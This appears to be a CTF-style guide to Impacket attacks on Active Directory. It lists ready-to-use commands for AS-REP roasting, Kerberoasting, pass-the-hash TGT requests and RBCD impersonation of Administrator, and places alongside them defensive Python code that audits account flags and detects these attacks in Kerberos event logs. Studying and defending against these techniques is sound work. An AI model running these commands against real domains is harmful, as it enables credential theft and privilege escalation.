Impacket

Impacket is a collection of Python classes for working with network protocols. This guide covers common security testing techniques using Impacket tools for Active Directory environments.

AS-REP Roasting (GetNPUsers)

AS-REP Roasting is an attack technique that targets user accounts that have "Do not require Kerberos preauthentication" enabled. Because the KDC does not make such an account prove knowledge of its password before answering, anyone who can reach the KDC can request authentication data for that user and receive an AS-REP whose encrypted portion is derived from the user's password and can be cracked offline.

AS-REP Roasting with User List

# AS-REP Roasting using a user list from 'users.txt'
impacket-GetNPUsers -no-pass -usersfile users.txt domain.htb/ 2>/dev/null

AS-REP Roasting for Specific User

# AS-REP Roasting for a specific user
impacket-GetNPUsers domain.htb/user -no-pass 2>/dev/null
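The exposure behind AS-REP Roasting is a single bit in the account's userAccountControl attribute (UF_DONT_REQUIRE_PREAUTH, 0x400000). The following is an added example, not code from the original page or from the Impacket project: it audits a constructed LDIF-style export of user objects (the accounts, DNs and values are invented for this example) for enabled accounts that have the bit set, and computes the value the attribute should carry once pre-authentication is required again.

```python
# Added example (not Impacket code): audit a constructed LDAP export for
# accounts with "Do not require Kerberos preauthentication" set.
# In Active Directory this is the UF_DONT_REQUIRE_PREAUTH bit (0x400000)
# of the userAccountControl attribute.

UF_ACCOUNTDISABLE = 0x0002
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

FLAG_NAMES = {
    UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
    UF_DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD",
    UF_DONT_REQUIRE_PREAUTH: "DONT_REQUIRE_PREAUTH",
}

# Constructed sample export, shaped like an LDIF dump of user objects.
# Accounts, DNs and userAccountControl values are invented for this example.
SAMPLE_LDIF = """\
dn: CN=svc_backup,OU=Service Accounts,DC=domain,DC=htb
sAMAccountName: svc_backup
userAccountControl: 4260352

dn: CN=jdoe,OU=Users,DC=domain,DC=htb
sAMAccountName: jdoe
userAccountControl: 512

dn: CN=old_vendor,OU=Users,DC=domain,DC=htb
sAMAccountName: old_vendor
userAccountControl: 4194818

dn: CN=tmp_admin,OU=Users,DC=domain,DC=htb
sAMAccountName: tmp_admin
userAccountControl: 4194816
"""


def parse_ldif(text):
    """Split a minimal LDIF dump (blank-line separated records) into dicts."""
    records = []
    for chunk in text.strip().split("\n\n"):
        rec = {}
        for line in chunk.splitlines():
            key, _, value = line.partition(": ")
            rec[key] = value
        records.append(rec)
    return records


def decode_uac(uac):
    """Names of the flags from FLAG_NAMES that are set in a userAccountControl value."""
    return [name for bit, name in FLAG_NAMES.items() if uac & bit]


def asrep_roastable(records):
    """Enabled accounts whose AS-REQ does not require pre-authentication.

    Disabled accounts are skipped: the KDC refuses to issue them a TGT, so
    there is no AS-REP to crack, although the flag should still be cleaned up.
    """
    findings = []
    for rec in records:
        uac = int(rec.get("userAccountControl", "0"))
        if (uac & UF_DONT_REQUIRE_PREAUTH) and not (uac & UF_ACCOUNTDISABLE):
            findings.append(rec["sAMAccountName"])
    return findings


def remediated_uac(uac):
    """userAccountControl value to write back so pre-authentication is required."""
    return uac & ~UF_DONT_REQUIRE_PREAUTH


if __name__ == "__main__":
    for rec in parse_ldif(SAMPLE_LDIF):
        uac = int(rec["userAccountControl"])
        print(f"{rec['sAMAccountName']:12} {uac:>8} {decode_uac(uac)}")
    print("AS-REP roastable:", asrep_roastable(parse_ldif(SAMPLE_LDIF)))
```

The report lists svc_backup and tmp_admin; old_vendor carries the bit but is disabled, which is why a real audit should also report disabled accounts separately so the flag is removed before anyone re-enables them.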

Kerberoasting Attack (GetUserSPNs)

Kerberoasting is an attack technique that targets service accounts in Active Directory. Any authenticated domain user can request service tickets for Service Principal Names (SPNs); because each ticket is encrypted with the service account's key, the encrypted portion can be cracked offline to recover that account's password.

Kerberoasting with Valid Credentials

# Kerberoasting Attack with valid credentials and NTLM authentication
impacket-GetUserSPNs -dc-ip 10.10.10.10 domain.htb/user -request 2>/dev/null
impacket-GetUserSPNs -dc-ip 10.10.10.10 domain.htb/user:'password' -request 2>/dev/null

Kerberoasting with Kerberos Authentication

# Kerberoasting Attack using Kerberos authentication
impacket-GetUserSPNs -dc-ip 10.10.10.10 -dc-host dc.domain.htb domain.htb/user -k -no-pass -request 2>/dev/null

Kerberoasting without Domain Credentials

# Kerberoasting without domain credentials but with AS-REP Roast user
# Requires user list in 'users.txt'
impacket-GetUserSPNs -no-preauth 'asrep-user' -request -usersfile users.txt domain.htb/ -dc-ip 10.10.10.161 2>/dev/null

Obtaining Ticket Granting Ticket [TGT] (getTGT)

The Ticket Granting Ticket (TGT) is used in Kerberos authentication to obtain service tickets. These commands show different methods to obtain a TGT. getTGT saves the ticket to a credential cache file (user.ccache) in the working directory; the -k -no-pass variants of the other commands read a cache selected through the KRB5CCNAME environment variable.

TGT with Password Authentication

# Obtaining TGT using basic password authentication
impacket-getTGT domain.htb/user:'password' -dc-ip 10.10.10.10

TGT with NTLM Hash

# Obtaining TGT using NTLM Hash (Pass-the-Hash)
impacket-getTGT domain.htb/user -hashes :<NTLM_HASH> -dc-ip 10.10.10.10

TGT with Kerberos Authentication

# Obtaining TGT using Kerberos authentication
impacket-getTGT domain.htb/user -k -no-pass -dc-ip 10.10.10.10
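On the domain controller, every TGT request in the AS-REP Roasting and getTGT sections above shows up as Windows Security event 4768. Two fields of that event carry the signal: PreAuthType 0 means the TGT was issued without pre-authentication (an AS-REP roastable account), and TicketEncryptionType 0x17 means RC4, which is what a Kerberos logon with only the NT hash (the -hashes form of getTGT) has to use, since AES keys are derived from the password and salt rather than from the hash. The following is an added example, not code from the original page or from Impacket: it classifies a set of constructed 4768 records (field names follow the 4768 event schema; all values are invented) and additionally counts failed requests per source address, which is what a name list fed to GetNPUsers produces for accounts that do not exist.

```python
# Added example (not Impacket code): classify constructed Windows Security
# event 4768 (Kerberos authentication ticket request) records.
# Field names follow the 4768 event schema; the values are invented.
from collections import Counter

SAMPLE_4768 = """\
4768 TargetUserName=svc_backup PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.14.5 Status=0x0
4768 TargetUserName=jdoe PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.10.10.50 Status=0x0
4768 TargetUserName=tmp_admin PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.14.5 Status=0x0
4768 TargetUserName=backupsvc PreAuthType=2 TicketEncryptionType=0x17 IpAddress=10.10.14.5 Status=0x0
4768 TargetUserName=nobody PreAuthType=- TicketEncryptionType=- IpAddress=10.10.14.5 Status=0x6
4768 TargetUserName=test PreAuthType=- TicketEncryptionType=- IpAddress=10.10.14.5 Status=0x6
4768 TargetUserName=admin2 PreAuthType=- TicketEncryptionType=- IpAddress=10.10.14.5 Status=0x6
4769 TargetUserName=jdoe ServiceName=FS01$ TicketEncryptionType=0x12 IpAddress=10.10.10.50 Status=0x0
"""

# Status (Result Code) 0x6 is KDC_ERR_C_PRINCIPAL_UNKNOWN: the requested
# account does not exist. A run of these from one address is name guessing.


def parse_events(text):
    """Turn 'EVENTID key=value key=value ...' lines into dicts."""
    events = []
    for line in text.splitlines():
        event_id, *pairs = line.split()
        fields = dict(pair.split("=", 1) for pair in pairs)
        fields["EventID"] = event_id
        events.append(fields)
    return events


def analyze_4768(text, fail_threshold=3):
    """Return (subject, reason) findings for the 4768 records in text.

    - PreAuthType 0 on a successful request: the account does not require
      pre-authentication, so its AS-REP can be cracked offline.
    - RC4 (0x17) TGT with pre-authentication: consistent with an NT hash being
      used as the Kerberos key; in an AES-only domain this is an anomaly.
    - fail_threshold or more failed requests from one IP: enumeration.
    """
    findings = []
    failures = Counter()
    for ev in parse_events(text):
        if ev["EventID"] != "4768":
            continue
        user, ip = ev["TargetUserName"], ev["IpAddress"]
        if ev["Status"] != "0x0":
            failures[ip] += 1
            continue
        if ev["PreAuthType"] == "0":
            findings.append((user, "TGT issued without pre-authentication (AS-REP roastable account)"))
        elif ev["TicketEncryptionType"] == "0x17":
            findings.append((user, "RC4 TGT with pre-authentication (possible NT-hash Kerberos logon)"))
    for ip, n in failures.items():
        if n >= fail_threshold:
            findings.append((ip, f"{n} failed AS-REQs (possible account enumeration)"))
    return findings


if __name__ == "__main__":
    for subject, reason in analyze_4768(SAMPLE_4768):
        print(f"{subject:14} {reason}")
```

The RC4 rule only earns its keep where the domain has moved to AES; a domain that still issues RC4 tickets to everyone will make it fire constantly, so pair it with an inventory of which accounts and hosts are still RC4-only.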

Resource Based Constrained Delegation [RBCD] (getST)

Resource Based Constrained Delegation (RBCD) is a delegation mechanism configured on the resource (target) account rather than on the delegating service: the target's msDS-AllowedToActOnBehalfOfOtherIdentity attribute lists the accounts allowed to impersonate users to it. An account listed there can request service tickets to the target on behalf of other users, which is why this attack technique can be used for privilege escalation.

RBCD with NTLM Authentication

# RBCD using NTLM authentication
impacket-getST -spn 'cifs/DC.domain.htb' -impersonate Administrator -dc-ip 10.10.10.10 'domain.htb'/'target_rbcd':'password' 2>/dev/null

RBCD with Pass-the-Hash

# RBCD using Pass-the-Hash technique
impacket-getST -spn 'cifs/DC.domain.htb' -impersonate Administrator -dc-ip 10.10.10.10 'domain.htb'/'target_rbcd' -hashes :<NTLM_HASH> 2>/dev/null

RBCD with Kerberos Authentication

# RBCD using Kerberos authentication
impacket-getST -spn 'cifs/DC.domain.htb' -impersonate Administrator -dc-ip 10.10.10.10 'domain.htb'/'target_rbcd' -k -no-pass 2>/dev/null
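Both the Kerberoasting section and the RBCD section above end in service ticket requests, and both are recorded on the domain controller as Windows Security event 4769. Kerberoasting shows up as RC4 (0x17) tickets for SPNs that belong to user accounts rather than machine accounts, typically many distinct SPNs from one principal within seconds; an S4U2Proxy request, which is what getST -impersonate issues, shows up as a 4769 whose TransitedServices field names the delegating account. The following is an added example, not code from the original page or from Impacket: it runs these three checks over constructed 4769 records (field names follow the 4769 event schema; the principals, SPNs, addresses and the allowlist of expected delegating services are invented).

```python
# Added example (not Impacket code): run Kerberoasting and delegation checks
# over constructed Windows Security event 4769 (service ticket request)
# records. Field names follow the 4769 schema; the values are invented.
from collections import defaultdict
from datetime import datetime

SAMPLE_4769 = """\
2024-05-01T12:00:01 4769 TargetUserName=jdoe@DOMAIN.HTB ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.10.14.5 TransitedServices=-
2024-05-01T12:00:02 4769 TargetUserName=jdoe@DOMAIN.HTB ServiceName=svc_http TicketEncryptionType=0x17 IpAddress=10.10.14.5 TransitedServices=-
2024-05-01T12:00:02 4769 TargetUserName=jdoe@DOMAIN.HTB ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=10.10.14.5 TransitedServices=-
2024-05-01T12:03:10 4769 TargetUserName=asmith@DOMAIN.HTB ServiceName=FS01$ TicketEncryptionType=0x12 IpAddress=10.10.10.51 TransitedServices=-
2024-05-01T12:05:00 4769 TargetUserName=Administrator@DOMAIN.HTB ServiceName=DC$ TicketEncryptionType=0x12 IpAddress=10.10.14.5 TransitedServices=target_rbcd@DOMAIN.HTB
2024-05-01T12:06:00 4769 TargetUserName=bob@DOMAIN.HTB ServiceName=WEB01$ TicketEncryptionType=0x12 IpAddress=10.10.10.52 TransitedServices=web_proxy_svc@DOMAIN.HTB
"""

# Constructed allowlist: services that are expected to delegate in this domain.
KNOWN_DELEGATING_SERVICES = {"web_proxy_svc@DOMAIN.HTB"}
# Constructed list of accounts that should never be impersonated via delegation.
PRIVILEGED_ACCOUNTS = {"administrator"}


def parse_4769(text):
    """Parse 'TIMESTAMP 4769 key=value ...' lines; keep only 4769 records."""
    events = []
    for line in text.splitlines():
        timestamp, event_id, *pairs = line.split()
        if event_id != "4769":
            continue
        ev = dict(pair.split("=", 1) for pair in pairs)
        ev["time"] = datetime.fromisoformat(timestamp)
        events.append(ev)
    return events


def is_privileged(principal):
    return principal.split("@")[0].lower() in PRIVILEGED_ACCOUNTS


def burst_findings(events, window=60, threshold=3):
    """One finding per principal that requested >= threshold distinct SPNs within window seconds."""
    by_user = defaultdict(list)
    for ev in events:
        by_user[ev["TargetUserName"]].append((ev["time"], ev["ServiceName"]))
    findings = []
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            services = {s for t, s in reqs[i:] if (t - t0).total_seconds() <= window}
            if len(services) >= threshold:
                findings.append((user, f"{len(services)} distinct service tickets within {window}s"))
                break
    return findings


def analyze_4769(text):
    """Return (principal, reason) findings: RC4 tickets to user SPNs, unexpected delegation, bursts."""
    events = parse_4769(text)
    findings = []
    for ev in events:
        user, svc = ev["TargetUserName"], ev["ServiceName"]
        # Kerberoasting: RC4 ticket for an SPN on a user account (machine
        # accounts end in '$'; krbtgt tickets are TGTs, not service tickets).
        if ev["TicketEncryptionType"] == "0x17" and not svc.endswith("$") and svc.lower() != "krbtgt":
            findings.append((user, f"RC4 (0x17) service ticket for {svc}"))
        # S4U2Proxy: the ticket was obtained through the service named in
        # TransitedServices on behalf of TargetUserName.
        transited = ev["TransitedServices"]
        if transited != "-" and (transited not in KNOWN_DELEGATING_SERVICES or is_privileged(user)):
            findings.append((user, f"service ticket for {svc} obtained via delegation through {transited}"))
    findings.extend(burst_findings(events))
    return findings


if __name__ == "__main__":
    for principal, reason in analyze_4769(SAMPLE_4769):
        print(f"{principal:28} {reason}")
```

The delegation rule fires on either condition: a delegating account that is not on the allowlist, or a privileged principal being impersonated at all. Keeping privileged accounts out of delegation entirely is the configuration fix (the "Account is sensitive and cannot be delegated" flag and the Protected Users group both do this), and the rule then catches any ticket that should have been impossible.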

Important Notes

  • Replace domain.htb with your target domain

  • Replace IP addresses with appropriate target IPs

  • Ensure you have proper authorization before conducting any security testing

  • These techniques should only be used in authorized penetration testing scenarios

  • Always follow responsible disclosure practices

Prerequisites

  • Impacket toolkit installed

  • Network access to target domain controller

  • Appropriate permissions for security testing activities
